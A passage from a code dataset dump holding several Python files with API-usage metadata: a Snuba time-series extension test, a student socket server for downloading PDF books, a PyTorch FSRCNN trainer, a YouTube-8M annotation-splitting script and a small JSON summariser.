"matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 166, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 167, "usage_type": "call"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 172, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 173, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 180, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 181, "usage_type": "call"}, {"api_name": "contour_statistics.points_outside", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "plot.PlottedSample", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 197, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 205, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}]}
+{"seq_id": "270847276", "text": "from datetime import datetime, timedelta\nfrom typing import Any, MutableMapping, cast\n\nimport pytest\n\nfrom snuba import state\nfrom snuba.clickhouse.columns import ColumnSet\nfrom snuba.datasets.entities import EntityKey\nfrom snuba.query.conditions import (\n BooleanFunctions,\n ConditionFunctions,\n binary_condition,\n)\nfrom snuba.query.data_source.simple import Entity as QueryEntity\nfrom snuba.query.expressions import Column, Expression, Literal\nfrom snuba.query.logical import Query\nfrom snuba.query.timeseries_extension import TimeSeriesExtension\nfrom snuba.request.request_settings import HTTPRequestSettings\nfrom snuba.schemas import validate_jsonschema\n\n\ndef build_time_condition(\n time_columns: str, from_date: datetime, to_date: datetime\n) -> Expression:\n return binary_condition(\n BooleanFunctions.AND,\n binary_condition(\n ConditionFunctions.GTE,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, from_date),\n ),\n binary_condition(\n ConditionFunctions.LT,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, to_date),\n ),\n )\n\n\ntest_data = [\n (\n {\n \"from_date\": \"2019-09-19T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 19, 10), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n \"from_date\": \"1970-01-01T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 18, 12), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n \"from_date\": \"2019-09-19T10:05:30,1234\",\n \"to_date\": \"2019-09-19T12:00:34,4567\",\n },\n build_time_condition(\n \"timestamp\",\n datetime(2019, 9, 19, 10, 5, 30),\n datetime(2019, 9, 19, 12, 0, 34),\n ),\n 60,\n ),\n]\n\n\n@pytest.mark.parametrize(\n \"raw_data, expected_ast_condition, expected_granularity\", test_data,\n)\ndef test_query_extension_processing(\n raw_data: MutableMapping[str, Any],\n expected_ast_condition: Expression,\n expected_granularity: int,\n) -> None:\n state.set_config(\"max_days\", 1)\n extension = TimeSeriesExtension(\n default_granularity=60,\n default_window=timedelta(days=5),\n timestamp_column=\"timestamp\",\n )\n\n valid_data = validate_jsonschema(\n raw_data, cast(MutableMapping[str, Any], extension.get_schema())\n )\n query = Query(QueryEntity(EntityKey.EVENTS, ColumnSet([])))\n\n request_settings = HTTPRequestSettings()\n\n extension.get_processor().process_query(query, valid_data, request_settings)\n assert query.get_condition() == expected_ast_condition\n assert query.get_granularity() == expected_granularity\n", "sub_path": "tests/query/test_timeseries_extension.py", "file_name": "test_timeseries_extension.py", "file_ext": "py", "file_size_in_byte": 2985, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 25, "usage_type": "call"}, {"api_name": "snuba.query.conditions.BooleanFunctions.AND", "line_number": 26, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.BooleanFunctions", "line_number": 26, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 27, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.GTE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 28, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 30, "usage_type": "call"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 32, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.LT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 33, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 35, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 83, "usage_type": "name"}, {"api_name": "snuba.state.set_config", "line_number": 86, "usage_type": "call"}, {"api_name": "snuba.state", "line_number": 86, "usage_type": "name"}, {"api_name": "snuba.query.timeseries_extension.TimeSeriesExtension", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "snuba.schemas.validate_jsonschema", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 94, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 94, "usage_type": "name"}, {"api_name": "snuba.query.logical.Query", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.query.data_source.simple.Entity", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.datasets.entities.EntityKey.EVENTS", "line_number": 96, "usage_type": "attribute"}, {"api_name": "snuba.datasets.entities.EntityKey", "line_number": 96, "usage_type": "name"}, {"api_name": "snuba.clickhouse.columns.ColumnSet", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.request.request_settings.HTTPRequestSettings", "line_number": 98, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 78, "usage_type": "attribute"}]}
+{"seq_id": "428771751", "text": "#Modulo servidor para el Proyecto 1 de Redes 1 Enero Marzo 2018\n#Integrantes: Salvador Gonzalez - 10-10296\n#\t\t\t Valentina Hernandez - 10-10352 \nfrom __future__ import print_function\nfrom time import sleep\nimport datetime as d\nimport os,signal\nimport sys\nimport socket as s\n\n#Funcion para listar las descargas completadas de los libros:\ndef listCompleted():\n\tprint()\n\ttry:\n\t\tfile = open(\"./Downladed_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tprint()\n\texcept:\n\t\tprint(\"No se han completado descargas todavia...\")\n#Funcion encargada de obtener la lista de todos los clientes que han consultado al servidor\ndef getClients():\n\tprint()\n\ttry:\n\t\tfile = open(\"./sessions.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tfile.close()\n\texcept:\n\t\tprint(\"El servidor todavia no ha sido consultado...\")\n#Funcion encargada de Mandarle la lista de los pdfs presentes en el servidor al cliente\n#@Param socket: cliente al cual se le enviara la informacion\ndef getBookList(socket):\n\tbooklist = os.listdir(\"./Pdfs\")\n\tfor book in booklist:\n\t\tsocket.send(book)\n\t\tsocket.send(\" \")\n\tsocket.send(\"#\")\n#Funcion para listar el numero de descargas x cliente y por libro\ndef listBookClient():\n\tocurrencias_c = {}#Diccionario para las ocurrencias de los clientes\n\tocurrencias_b = {}#Diccionario para las ocurrencias de los libros\n\tprint()\n\ttry:\n\t\tfile = open(\"./Client_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tclient,libro,nulo = line.split(\"-\")\n\t\t\tif client in ocurrencias_c:\n\t\t\t\tocurrencias_c[client] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_c[client] = 1\n\t\t\tif libro in ocurrencias_b:\n\t\t\t\tocurrencias_b[libro] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_b[libro] = 1\n\t\tprint(\"Numero de descargas por libro\")\n\t\tfor key in ocurrencias_b:\n\t\t\tprint(\"Libro: %s - Descargas: %s\"%(key,ocurrencias_b[key]))\n\t\tprint()\n\t\tprint(\"Numero de descargas por cliente\")\n\t\tfor key in ocurrencias_c:\n\t\t\tprint(\"Cliente: %s - Descargas: %s\"%(key,ocurrencias_c[key]))\n\texcept:\n\t\tprint(\"No se han realizado descargas en este servidor....\")\n#Funcion para listar las descargas en curso\ndef listDownloads():\n\tdownList = os.listdir(\"./Server_info\")\n\tif downList:\n\t\tfor download in downList:\n\t\t\tfile = open(\"./Server_info/%s\"%(download),\"r\")\n\t\t\tprint()\n\t\t\tprint(file.readline(),end=\"\")\n\t\t\tfile.close()\n\t\tprint()\n\telse:\n\t\tprint(\"\\nNo existen descargas en curso actualmente....\")\n#Funcion para el envio del alchivo al cliente\n#@Param socket: cliente al cual se le enviara el archivo\n#@Param info: informacion del cliente al cual se le enviara el pdf tupla (IP,PUERTO)\n#@Param pid: PID del proceso que envia el archivo para llevar el estatus de descarga\ndef sendBook(socket,info,pid):\n\tbook = socket.recv(200)#Variable para contener la informacion del libro (paquete de tamano fijo)\n\tbook = filter(lambda x: x!=\" \",book)#obtenemos el nombre\n\tfilesize = str(os.path.getsize(\"./Pdfs/%s\"%(book)))#Tamagno en bytes del archivo a enviar\n\twhile(len(filesize) < 10):\n\t\tfilesize+=\" \"\n\tsocket.send(filesize)\n\tfilesize = filter(lambda x: x != \" \",filesize)\n\t#Archivo que deseamos enviar\n\tfile = open(\"./Pdfs/%s\"%(book),\"r\")\n\tread = 0 #Variable para los bytes leidos\n\tdata = \" \"#Variable para guardar la data\n\twhile(data != \"\"):\n\t\t#Archivo para guardar el status de la descarga\n\t\tstatus = open(\"./Server_info/%s.txt\"%(pid),\"w\")\n\t\tdata = file.read(1000)\n\t\tread += len(data)\n\t\tsocket.send(data)\n\t\tstatus.write(\"CLiente: %s - Libro: %s - %s de %s bytes...\"%(info[0],book,read,filesize))\n\t\tstatus.close()\n\t\tsleep(3)\n\tfile.close()\n\tos.remove(\"./Server_info/%s.txt\"%(pid))\n\t#Si se completa la descarga/ anadimos el libro a la lista de descargas\n\tdate = d.datetime.now()\n\tfile = open(\"./Downladed_Books.txt\",\"a\")\n\tfile.write(\"Libro: %s - Fecha: %s-%s-%s - Hora: %s:%s:%s\\n\"%(book,date.day,date.month,date.year,date.hour,date.minute,date.second))\n\tfile.close()\n\t#Registro para el num de descargas x libro x cliente\n\tfile = open(\"./Client_Books.txt\",\"a\")\n\tfile.write(\"%s-%s-\\n\"%(info[0],book))\n\tfile.close()\n\ndef main():\n\tif (len(sys.argv) != 2):\n\t\tprint(\"La invocacion para el servidor debe ser de la forma: \",end=\"\")\n\t\tprint(\"python server.py \")\n\t\treturn\n\tport = sys.argv[1]#Numero de puerto para el socket\n\tserver_info = (\"\",int(port))#Informacion de nuestro servidor\n\t#la tupla contiene informacion referente a (Direccion Ip,Puerto de escucha)\n\t#Definimos el socket de para nuestro servidor\n\t#AF_INET y SOCK_STREAM son parametros para utilizar Protocolo TCP\n\t#AF_INET es para direcciones IPv4\n\tprint(\"Generando socket...\")\n\tsleep(1)\n\ttry:\n\t\tserver_socket = s.socket(s.AF_INET,s.SOCK_STREAM)\n\t\tprint(\"socket creado...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al generar el Socket para el servidor...\")\n\t\treturn\n\tprint(\"Asociando puerto %s al socket...\" % port)\n\tsleep(1)\n\ttry:\n\t\tserver_socket.bind(server_info)\n\t\tprint(\"Asociancion establecida...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al asociar el puerto al socket...\")\n\t\treturn\n\t#Creamos el directorio para la informacion del server:\n\ttry:\n\t\tos.mkdir(\"./Server_info\")\n\texcept:\n\t\tfiles = os.listdir(\"./Server_info\")\n\t\tfor file in files:\n\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t#Proceso hijo para la escuha de las peticiones\n\tconnection_handler = os.fork()\n\t#Codigo para el proceso hijo\n\tif connection_handler == 0:\n\t\t#Guardamos el PID del hijo para cerrarlo al finalizar el programa\n\t\tp_id = str(os.getpid())\n\t\tfile = open(\"./listen_process.txt\",\"w\")\n\t\tfile.write(p_id)\n\t\tfile.close()\n\t\twhile True:\n\t\t\t#Listen se encarga de escuchar las peticiones, el valor 100 esel tama;o de la cola\n\t\t\t#de peticiones que puede recibir el servidor\n\t\t\tserver_socket.listen(100)\n\t\t\t#Esperamos aceptar las peticiones de los clientes\n\t\t\t#client_info es una tupla de la forma (IP,PUERTO)\n\t\t\tclient_socket,client_info = server_socket.accept()\n\t\t\t#Anadimos la sesion\n\t\t\tfile = open(\"./sessions.txt\",\"a\")\n\t\t\tdate = d.datetime.now()\n\t\t\tfile.write(\"Cliente: %s Fecha: %s-%s-%s Hora: %s:%s:%s\\n\" %(client_info[0],date.day,date.month,date.year,date.hour,date.minute,date.second))\n\t\t\tfile.close()\n\t\t\t#Se vuelve a crear un fork para atender las peticiones una ve escuchadas\n\t\t\trequest_processor = os.fork()\n\t\t\t#Codigo para el proceso hijo encargado de atender/ejecutar las peticiones\n\t\t\tif (request_processor == 0):\n\t\t\t\tp_id = str(os.getpid())\n\t\t\t\toption = client_socket.recv(1)\n\t\t\t\tif option == \"2\":\n\t\t\t\t\tgetBookList(client_socket)\n\t\t\t\telif option == \"3\":\n\t\t\t\t\tsendBook(client_socket,client_info,p_id)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\t\tquit()\n\t#codigo para el proceso padre - Menu principal\n\telse:\n\t\toption = 0\n\t\twhile(option < 5):\n\t\t\tprint(\"\\nBienvenido al sistema de gestion del servidor... Que opcion desea ejecutar\")\n\t\t\tprint(\"1: LIBROS_DESCARGADOS\")\n\t\t\tprint(\"2: CLIENTES_QUE_CONSULTARON\")\n\t\t\tprint(\"3: NUM_DESCARGASxLIBROxCLIENTE\")\n\t\t\tprint(\"4: DESCARGAS_EN_CURSO\")\n\t\t\tprint(\"5: Salir...\")\n\t\t\toption = raw_input(\"Opcion: \")\n\t\t\tif option.isdigit():\n\t\t\t\toption = int(option)\n\t\t\t\t#Opcion para el listado de descargas completas\n\t\t\t\tif option == 1:\n\t\t\t\t\tlistCompleted()\n\t\t\t\t#Opcion para los clientes que me han consultado\n\t\t\t\telif option == 2:\n\t\t\t\t\tgetClients()\n\t\t\t\telif option == 3:\n\t\t\t\t\tlistBookClient()\n\t\t\t\t#Opcion para listar las descargas en curso\n\t\t\t\telif option == 4:\n\t\t\t\t\tlistDownloads()\n\t\t\t\t#Opcion para finalizar la corrida\n\t\t\t\telif option == 5:\n\t\t\t\t\t#Cerramos el socket del server\n\t\t\t\t\tserver_socket.close()\n\t\t\t\t\t#Matamos el proceso listener para dejar libre el puerto\n\t\t\t\t\tfile = open(\"./listen_process.txt\",\"r\")\n\t\t\t\t\tp_id = int(file.read())\n\t\t\t\t\tos.kill(p_id,signal.SIGKILL)\n\t\t\t\t\tos.remove(\"./listen_process.txt\")\n\t\t\t\t\t#Borramos el contenido de la carpera Server_info\n\t\t\t\t\tinfo = os.listdir(\"./Server_info\")\n\t\t\t\t\tfor file in info:\n\t\t\t\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t\t\t\t\tos.rmdir(\"./Server_info\")\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\t\toption = 0\n\t\t\telse:\n\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\toption = 0\n\n\n\nif __name__ == '__main__':\n\tmain()", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 7875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 36, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 37, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 38, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "socket.recv", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "socket.send", "line_number": 87, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 128, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 128, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 128, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 135, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 145, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 147, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 149, "usage_type": "call"}, {"api_name": "os.fork", "line_number": 151, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.fork", "line_number": 172, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 175, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 215, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 216, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 218, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 220, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "473138363", "text": "import torch\nimport torch.backends.cudnn as cudnn\n\nfrom models.FSRCNN.model import Net\nfrom trainer import Trainer\n\n\nclass FSRCNNTrainer(Trainer):\n def __init__(self, config, training_loader, valid_loader):\n super(FSRCNNTrainer, self).__init__(config, training_loader, valid_loader, \"fsrcnn\")\n\n def build_model(self):\n self.model = Net(num_channels=3, upscale_factor=self.upscale_factor).to(self.device)\n self.model.weight_init(mean=0.0, std=0.2)\n self.criterion = torch.nn.MSELoss()\n torch.manual_seed(self.seed)\n\n if self.GPU_IN_USE:\n torch.cuda.manual_seed(self.seed)\n cudnn.benchmark = True\n self.criterion.cuda()\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[50, 75, 100], gamma=0.5) # lr decay\n", "sub_path": "models/FSRCNN/fsrcnn_trainer.py", "file_name": "fsrcnn_trainer.py", "file_ext": "py", "file_size_in_byte": 906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "trainer.Trainer", "line_number": 8, "usage_type": "name"}, {"api_name": "models.FSRCNN.model.Net", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 24, "usage_type": "attribute"}]}
+{"seq_id": "230193758", "text": "import json\nimport random\nfrom argparse import ArgumentParser\nfrom collections import defaultdict\nfrom os import makedirs, listdir\nfrom os.path import exists, join, isfile, basename\n\n\ndef ensure_dir_exists(dir_path):\n if not exists(dir_path):\n makedirs(dir_path)\n\n\ndef get_valid_sources(all_sources):\n return [s for s in all_sources if exists(s)]\n\n\ndef print_data_sources_stat(data_sources):\n print('Specified {} valid data sources:'.format(len(data_sources)))\n for data_source in data_sources:\n print(' - {}'.format(data_source))\n\n\ndef parse_records(data_sources):\n num_records = defaultdict(int)\n out_records = dict()\n for data_source in data_sources:\n data_type = basename(data_source).split('.')[0]\n\n with open(data_source) as input_stream:\n for line_id, line in enumerate(input_stream):\n if line_id == 0:\n continue\n\n line_elements = line.strip().split(',')\n if len(line_elements) != 4:\n continue\n\n label, video_name, start, end = line_elements\n\n segment_id = num_records[video_name]\n segment_name = f'{video_name}_segment{segment_id}'\n\n num_records[video_name] += 1\n out_records[segment_name] = dict(\n label=int(label),\n data_type=data_type\n )\n\n return out_records\n\n\ndef validate_videos(records, videos_dir, extension):\n downloaded_videos = set(\n f.replace(f'.{extension}', '')\n for f in listdir(videos_dir)\n if isfile(join(videos_dir, f)) and f.endswith(extension)\n )\n all_videos = set(video_name for video_name in records.keys())\n\n valid_videos = downloaded_videos & all_videos\n out_records = {video_name: records[video_name] for video_name in valid_videos}\n\n return out_records\n\n\ndef split_train_val_subsets(records, test_ratio=0.1):\n assert 0.0 < test_ratio < 1.0\n\n by_labels = defaultdict(list)\n for video_name, content in records.items():\n by_labels[content['label']].append(video_name)\n\n clustered_segments = dict()\n for label, segments in by_labels.items():\n videos = defaultdict(list)\n for segment in segments:\n video, _ = segment.split('_segment')\n videos[video].append(segment)\n\n clustered_segments[label] = videos\n\n out_records = dict()\n for label, videos in clustered_segments.items():\n num_records = len(by_labels[label])\n assert num_records > 1\n\n video_names = list(videos.keys())\n num_videos = len(video_names)\n assert num_videos > 1\n\n num_test_samples = min(num_records - 1, max(1, int(num_records * test_ratio)))\n num_test_videos = min(num_videos - 1, max(1, int(num_videos * test_ratio)))\n\n num_selected_test_samples = 0\n test_videos = []\n for test_video_name in random.sample(video_names, num_test_videos):\n test_videos.append(test_video_name)\n segments = videos[test_video_name]\n\n for segment in segments:\n out_records[segment] = dict(label=label, data_type='val')\n\n num_selected_test_samples += len(segments)\n if num_selected_test_samples >= num_test_samples:\n break\n\n train_videos = list(set(video_names) - set(test_videos))\n for train_video_name in train_videos:\n segments = videos[train_video_name]\n\n for segment in segments:\n out_records[segment] = dict(label=label, data_type='train')\n\n return out_records\n\n\ndef build_classmap(records):\n labels = set(record['label'] for record in records.values())\n return {class_name: i for i, class_name in enumerate(sorted(labels))}\n\n\ndef convert_annot(records, classmap, extension):\n out_records = dict()\n for video_name, content in records.items():\n label_id = classmap[content['label']]\n out_records[f'{video_name}.{extension}'] = label_id, content['data_type']\n\n return out_records\n\n\ndef group_by_type(annotation):\n out_data = defaultdict(list)\n for video_name, (label_id, data_type) in annotation.items():\n out_data[data_type].append((video_name, label_id))\n\n return out_data\n\n\ndef write_classmap(classmap, out_path):\n with open(out_path, 'w') as output_stream:\n json.dump(classmap, output_stream)\n\n\ndef write_annot(records, out_path):\n with open(out_path, 'w') as output_stream:\n for video_name, label_id in records:\n output_stream.write(f'{video_name} {label_id}\\n')\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--sources', '-s', nargs='+', type=str, required=True)\n parser.add_argument('--videos_dir', '-v', type=str, required=True)\n parser.add_argument('--output_dir', '-o', type=str, required=True)\n parser.add_argument('--extension', '-e', type=str, required=False, default='avi')\n parser.add_argument('--test_ratio', '-r', type=float, required=False, default=0.1)\n args = parser.parse_args()\n\n ensure_dir_exists(args.output_dir)\n\n data_sources = get_valid_sources(args.sources)\n print_data_sources_stat(data_sources)\n assert len(data_sources) > 0\n\n records = parse_records(data_sources)\n print(f'Found {len(records)} records.')\n\n classmap = build_classmap(records)\n print(f'Found {len(classmap)} unique classes.')\n\n out_classmap_path = join(args.output_dir, 'classmap.json')\n write_classmap(classmap, out_classmap_path)\n print(f'Dumped classmap to: {out_classmap_path}')\n\n records = validate_videos(records, args.videos_dir, args.extension)\n print(f'Validated {len(records)} videos.')\n\n records = split_train_val_subsets(records, args.test_ratio)\n\n annot = convert_annot(records, classmap, args.extension)\n split_annot = group_by_type(annot)\n\n for data_type, records in split_annot.items():\n out_annot_path = join(args.output_dir, f'{data_type}.txt')\n write_annot(records, out_annot_path)\n print(f'Dumped annot to: {out_annot_path}')\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/data/youtube-8m/prepare_annot.py", "file_name": "prepare_annot.py", "file_ext": "py", "file_size_in_byte": 6137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 28, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 70, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 76, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 97, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}]}
+{"seq_id": "558869849", "text": "import json\n\njson_file=open('week1.json')\ndata=json.load(json_file)\nprint(type(data))\nview={'Monday':{},'Tuesday':{},'Wednesday':{},'Thursday':{},'Friday':{}}\n\nfor p in data:\n temp=0\n for k,v in p[2]['conference-categories-count'].items():\n temp=temp+v\n if p[0]['dow']=='Monday':\n view['Monday'][p[1]['time']]=temp\n elif p[0]['dow']=='Tuesday':\n view['Tuesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Wednesday':\n view['Wednesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Thursday':\n view['Thursday'][p[1]['time']] = temp\n elif p[0]['dow']=='Friday':\n view['Friday'][p[1]['time']] = temp\n\nfor k,v in view.items():\n print(\"{}===>{}\".format(k,v))\n\n\n\n", "sub_path": "ReadJSON.py", "file_name": "ReadJSON.py", "file_ext": "py", "file_size_in_byte": 717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 4, "usage_type": "call"}]}
